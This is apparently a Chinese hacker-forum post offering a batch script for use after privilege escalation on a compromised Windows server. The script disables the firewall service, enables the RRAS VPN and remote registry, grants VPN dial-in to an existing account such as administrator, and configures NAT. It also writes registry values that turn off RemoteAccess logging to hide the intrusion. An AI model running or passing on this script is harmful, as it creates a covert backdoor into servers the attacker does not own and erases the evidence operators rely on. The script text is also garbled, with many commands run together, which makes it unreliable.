我们经常遇到服务器开了3389,又是外网IP,又终端不了, 今天看到一个比较淫荡的方法,就是用提权工具执行一个建立vpn的批处理,然后再通过内网IP访问服务器
命令行开VPN批处理(BAT):@echooff
rem 设置服务sc config sharedaccess start=disablednet stop SharedAccess
sc config remoteaccess start=autonet start RemoteAccessnet start lanmanserver
net start RemoteRegistryrem 开启VPN
netsh rasset uservpnuser permit rem vpnuser改成已存在的某个账户,比如administrator
netsh ras ip add range10.10.1.1 10.10.10.10rem 设置地址池的范围,比如192.168.111.1 192.168.111.11
netsh ras ipset addrassignpoolnetsh routing ip nat install
netsh routing ip nat add interface 本地连接 full rem”本地连接”可能是其他名称,最好先ipconfig确认下
netsh routing ip nat add interface 内部 privatenetsh routing ip igmp install
netsh routing ip igmp add interface 内部 igmpprototype=IGMPRTRV3ifenabled=enable
robustvar=2startupquerycount=2startupqueryinterval=31genqueryinterval=125
genqueryresptime=10lastmemquerycount=2lastmemqueryinterval=1000accnonrtralertpkts=YES
netsh routing ip igmp add interface name=”本地连接”igmpprototype=IGMPPROXY ifenabled=enable
rem 隐藏日志Windows Registry Editor Version5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteAccessParameters]
“LoggingFlags”=dword:00000000
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasManParameters]
“ProhibitIPsec”=dword:00000001
将以上代码保存为bat文件在命令行下执行,前提是至少有administrator权限。成功开启后会打开TCP的1723端口。